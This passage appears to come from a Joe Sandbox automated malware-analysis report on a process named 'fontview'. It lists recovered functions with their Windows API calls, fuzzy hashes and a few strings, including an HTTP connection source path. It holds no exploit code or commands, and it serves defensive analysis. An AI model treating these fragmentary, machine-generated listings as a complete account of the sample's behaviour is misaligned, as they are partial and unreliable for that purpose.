                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _swscanf
                                                      • String ID: %d.%d.%d.%d%c$0.0.0.0
                                                      • API String ID: 2748852333-3443380886
                                                      • Opcode ID: 11a4e99fa972d5e1a6fe653c7a82eca1ed9a2bbf27e2babda35382efd54e40f9
                                                      • Instruction ID: 25fb6b1349beb459330e93536e0f20326eda5ba292d59683b0e3ad5ee5c2430a
                                                      • Opcode Fuzzy Hash: 11a4e99fa972d5e1a6fe653c7a82eca1ed9a2bbf27e2babda35382efd54e40f9
                                                      • Instruction Fuzzy Hash: 20118231E001189ADB15DAA89C91BFE73ACEB09241F50456AE807E7540DA61AA048391
                                                      APIs
                                                      • GetNativeSystemInfo.KERNEL32(B7A91B76,B7A91B76,00000000,?,00000000,100505E8,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F1C2
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00001000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F27C
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F2B4
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F2C4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateEvent$CountCriticalInfoInitializeNativeSectionSpinSystem
                                                      • String ID:
                                                      • API String ID: 2029452385-0
                                                      • Opcode ID: 48cc98ecf05bcf4a83353a1e2f05b4666f9f9ba61c6cc34eaeef7f0985bb3f22
                                                      • Instruction ID: ef2a892a8e3a634590cf7f156d9bf4d127c5d71b8d2808cd9302d73839e031fd
                                                      • Opcode Fuzzy Hash: 48cc98ecf05bcf4a83353a1e2f05b4666f9f9ba61c6cc34eaeef7f0985bb3f22
                                                      • Instruction Fuzzy Hash: 4141E6B1610B56ABE314CF69C958786FBF4FB04318F50421AE5189BA90D7BAB468CFC4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$ErrorFileLastUnmapView
                                                      • String ID:
                                                      • API String ID: 4017539725-0
                                                      • Opcode ID: 1f7536b180434f0ac689f1fd93ed1486ba2fcd2b55e6192a352b8c4e4ef55d60
                                                      • Instruction ID: 79f660d10e505635d13e7438cecf30ec9b8fed93fcc1d4ef52dd99797ee5355a
                                                      • Opcode Fuzzy Hash: 1f7536b180434f0ac689f1fd93ed1486ba2fcd2b55e6192a352b8c4e4ef55d60
                                                      • Instruction Fuzzy Hash: 92314D71204351DFD710CF65D884B2BB7E8FB88750F418A1DF855C7280EB75D8088B92
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,B7A91B76,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 100240D2
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 10024107
                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000057,?,00000000,B7A91B76,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?), ref: 10024133
                                                      • SetLastError.KERNEL32(00000057,B7A91B76,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 1002413A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CompletionEnterErrorLastLeavePostQueuedStatus
                                                      • String ID:
                                                      • API String ID: 1216617850-0
                                                      • Opcode ID: 527145bfde23408dc2ef0d79ea1e4c64725fdf5e0d848d6576dc0aa07ecb7eaf
                                                      • Instruction ID: d1afc4b1f62b75d7c0d42d46145dd7902132c798b5be5b94712711f6fd68f30f
                                                      • Opcode Fuzzy Hash: 527145bfde23408dc2ef0d79ea1e4c64725fdf5e0d848d6576dc0aa07ecb7eaf
                                                      • Instruction Fuzzy Hash: F321CF32600255EFDB10CF84DC84B9ABBF8FB44750F528669F9198B290CB759884CB50
                                                      APIs
                                                      • GetFileSize.KERNEL32(1002594E,00000000,00000000,00000000,1002594E,00000000), ref: 100252D2
                                                      • CreateFileMappingA.KERNEL32(1002594E,00000000,00000002,00000000,00000000,00000000), ref: 100252E6
                                                      • MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,?,00000000), ref: 10025329
                                                      • CloseHandle.KERNEL32(?), ref: 1002533F
                                                        • Part of subcall function 100252A0: GetLastError.KERNEL32(1002533A), ref: 100252A0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastMappingSizeView
                                                      • String ID:
                                                      • API String ID: 322783378-0
                                                      • Opcode ID: a72341e326a4ba0fbb02c033ca57f4eff7cf59df7aa94b10707fb8fa9e828f03
                                                      • Instruction ID: b24b83d2de12238dc06bc647823d72b1e2335c8e7f7e86260e440beeb8542a3f
                                                      • Opcode Fuzzy Hash: a72341e326a4ba0fbb02c033ca57f4eff7cf59df7aa94b10707fb8fa9e828f03
                                                      • Instruction Fuzzy Hash: 4F11A076600616BFE710DF68EC05B69BBB8FB08311F50422AFD01D3680D7B1A9649BE8
                                                      APIs
                                                      • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,100227E0,?,1001ED0E,B7A91B76), ref: 100201F1
                                                        • Part of subcall function 10020310: InterlockedCompareExchange.KERNEL32(000001BF,00000100,000000FF), ref: 1002036A
                                                      • _free.LIBCMT ref: 10020215
                                                      • HeapDestroy.KERNEL32(?,?,?,?,?,?,100227E0,?,1001ED0E,B7A91B76), ref: 10020243
                                                      • HeapCreate.KERNEL32(?,?,?,?,?,?,?,?,100227E0,?,1001ED0E,B7A91B76), ref: 10020252
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CompareCreateDestroyExchangeFreeInterlocked_free
                                                      • String ID:
                                                      • API String ID: 3571060031-0
                                                      • Opcode ID: 78171274b88b9d871781253e762ba40eb7b37c92cc86dd6b7c56485abf7519fb
                                                      • Instruction ID: 0a878298919a2728ada9c9bda282240638a9b5f958c97604bce3e13ab8e5967f
                                                      • Opcode Fuzzy Hash: 78171274b88b9d871781253e762ba40eb7b37c92cc86dd6b7c56485abf7519fb
                                                      • Instruction Fuzzy Hash: 901106B520070AEBD704CFA5D884B9AFBB9FF08344F50421AE90897651EB71F924CBA0
                                                      APIs
                                                      • _free.LIBCMT ref: 1001B524
                                                      • _free.LIBCMT ref: 1001B553
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,1001B3A2,?,000001C8), ref: 1001B573
                                                      • HeapFree.KERNEL32(00000000,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B57A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap_free$FreeProcess
                                                      • String ID:
                                                      • API String ID: 1072109031-0
                                                      • Opcode ID: 557abc633146d36798c19daa65f0b5d008b94df4e8b7e6fe234b61a76df1c4f3
                                                      • Instruction ID: 91e55399d9fdf6679953e435a265fa2e3a507e988a5e8b74e9227a28433c2d31
                                                      • Opcode Fuzzy Hash: 557abc633146d36798c19daa65f0b5d008b94df4e8b7e6fe234b61a76df1c4f3
                                                      • Instruction Fuzzy Hash: F0113532400F11EFDB619F65DD85A27BBEAFF04756705992EE19A4A921CB32F890CB00
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 10025230
                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 10025242
                                                      • SwitchToThread.KERNEL32(?,?,?,?,B7A91B76,?,?,?,?,?,10050C98,000000FF), ref: 10025263
                                                      • Sleep.KERNEL32(00000001,?,?,?,?,B7A91B76,?,?,?,?,?,10050C98,000000FF), ref: 10025272
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CompareCurrentExchangeInterlockedSleepSwitch
                                                      • String ID:
                                                      • API String ID: 2093090637-0
                                                      • Opcode ID: 04a259b299e80969bc2d1559d06b55689e7ce4389a5ecaf7031aa6dca42bf6a5
                                                      • Instruction ID: f6dbf606553bdfc6012b380ff7cb12dc7a9431c74cd62dc39b8d8cbb32ce41fd
                                                      • Opcode Fuzzy Hash: 04a259b299e80969bc2d1559d06b55689e7ce4389a5ecaf7031aa6dca42bf6a5
                                                      • Instruction Fuzzy Hash: 64012636A40132DBDB21D7A4ECD87ADF358FB47363F914135ED87820C0C672484992A8
                                                      APIs
                                                      • _free.LIBCMT ref: 1002027A
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • _free.LIBCMT ref: 10020282
                                                      • _malloc.LIBCMT ref: 100202D9
                                                      • _malloc.LIBCMT ref: 100202E6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free_malloc$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 2483110480-0
                                                      • Opcode ID: f7696e20da9f14cc8a4f9f273da0e532d3d92c2e7cd30629e5baf4350a69fc1c
                                                      • Instruction ID: b96996ba9dd0fdd4b47136e9c24c81bb7b11f053f0dbecd90a5a6174a1790e6f
                                                      • Opcode Fuzzy Hash: f7696e20da9f14cc8a4f9f273da0e532d3d92c2e7cd30629e5baf4350a69fc1c
                                                      • Instruction Fuzzy Hash: 681109B5501200DADB11DF14ED85B86BFA9EF41315F0880A9EE089E29BE7B6E414DBA4
                                                      APIs
                                                      • ___BuildCatchObject.LIBCMT ref: 100384B2
                                                        • Part of subcall function 10038AD4: ___AdjustPointer.LIBCMT ref: 10038B1D
                                                      • _UnwindNestedFrames.LIBCMT ref: 100384C9
                                                      • ___FrameUnwindToState.LIBCMT ref: 100384DB
                                                      • CallCatchBlock.LIBCMT ref: 100384FF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                      • String ID:
                                                      • API String ID: 2633735394-0
                                                      • Opcode ID: 9314967b18044089f415324ef535ab2f519643b3b7824ee7fb655c0c72ac471c
                                                      • Instruction ID: 989c8a7310246bee1fd08c7f23ef03ea6940c226f7113538dbc51997d19096da
                                                      • Opcode Fuzzy Hash: 9314967b18044089f415324ef535ab2f519643b3b7824ee7fb655c0c72ac471c
                                                      • Instruction Fuzzy Hash: F3011336000209BFCF138F55CC05ECA3BBAFF58755F118054FA186A120D736EA61EBA1
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,?,?,?,?,10016F76,?,?), ref: 10017445
                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,10016F76,?,?), ref: 10017453
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017466
                                                      • GetTickCount.KERNEL32 ref: 10017478
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$CountFileLocalSystemTickUnothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 2988263349-0
                                                      • Opcode ID: e7936d27054c44839712e425be5c1da52c9c64f107c8cd8e01f798dca73fca39
                                                      • Instruction ID: e9295d616fd35ee15893a1400ce62d95032bf78b27ac2fe2c3c9e10ff6d825b8
                                                      • Opcode Fuzzy Hash: e7936d27054c44839712e425be5c1da52c9c64f107c8cd8e01f798dca73fca39
                                                      • Instruction Fuzzy Hash: 24F03177A00225ABDB00DBE9CD85ACB7BBDFB88250F404023EB05D3664D6B49545DF90
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001823A
                                                        • Part of subcall function 10018A47: __EH_prolog.LIBCMT ref: 10018A4C
                                                        • Part of subcall function 10018A47: std::locale::_Init.LIBCPMT ref: 10018A91
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      • std::locale::_Init.LIBCPMT ref: 100182C4
                                                        • Part of subcall function 1003274C: __EH_prolog3.LIBCMT ref: 10032753
                                                        • Part of subcall function 1003274C: std::_Lockit::_Lockit.LIBCPMT ref: 1003275D
                                                        • Part of subcall function 1003274C: std::locale::_Setgloballocale.LIBCPMT ref: 10032779
                                                        • Part of subcall function 1003274C: _Yarn.LIBCPMT ref: 1003278F
                                                      Strings
                                                      • inc\http\HttpConnection.cpp, xrefs: 10018248
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::locale::_$H_prologInit$H_prolog3LockitLockit::_SetgloballocaleYarn_mallocstd::_
                                                      • String ID: inc\http\HttpConnection.cpp
                                                      • API String ID: 3634387935-15934736
                                                      • Opcode ID: b8e81a0581a06a1258dea67b2edc56d44d9bd5ea9022d2f4a26446fb18cf1ade
                                                      • Instruction ID: 7a1205773bd905cc226a88309ac9bc09dfb51d4ddb2d57aec835063900d9c3eb
                                                      • Opcode Fuzzy Hash: b8e81a0581a06a1258dea67b2edc56d44d9bd5ea9022d2f4a26446fb18cf1ade
                                                      • Instruction Fuzzy Hash: 8241C1B5600B418FC325CF59C580A96FBF4FF48314B50896ED89A8BB11E7B4BA09CF50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: req$string too long
                                                      • API String ID: 4104443479-3134357765
                                                      • Opcode ID: 8c6eb53e26efdb99629278785807a9547f397b84b6f4148008f3d644793ba4bd
                                                      • Instruction ID: f34db192f8e0fa3b1fa1e0aeedf2e1d9bd4896eeb5cd9540ea6668629b64f2b9
                                                      • Opcode Fuzzy Hash: 8c6eb53e26efdb99629278785807a9547f397b84b6f4148008f3d644793ba4bd
                                                      • Instruction Fuzzy Hash: E111B231300740ABEB35DEA9D84195BB7EDEF427D0B10892EF956CB249CB71E908C7A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 4104443479-4289949731
                                                      • Opcode ID: fe610288dba0ea71c4f34b643ab66fc5b79ff27ef753e082791bae47dea014b6
                                                      • Instruction ID: 33c90798f0d8516c084e0f09cf76161ef6dc691a2bb1ff66f4c7af30e0da5eef
                                                      • Opcode Fuzzy Hash: fe610288dba0ea71c4f34b643ab66fc5b79ff27ef753e082791bae47dea014b6
                                                      • Instruction Fuzzy Hash: 2C1184717107049BC724CE58D894E5AB7EAEB85750B20492EE8A2CF6C1DBB1EA84C790
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologwsprintf
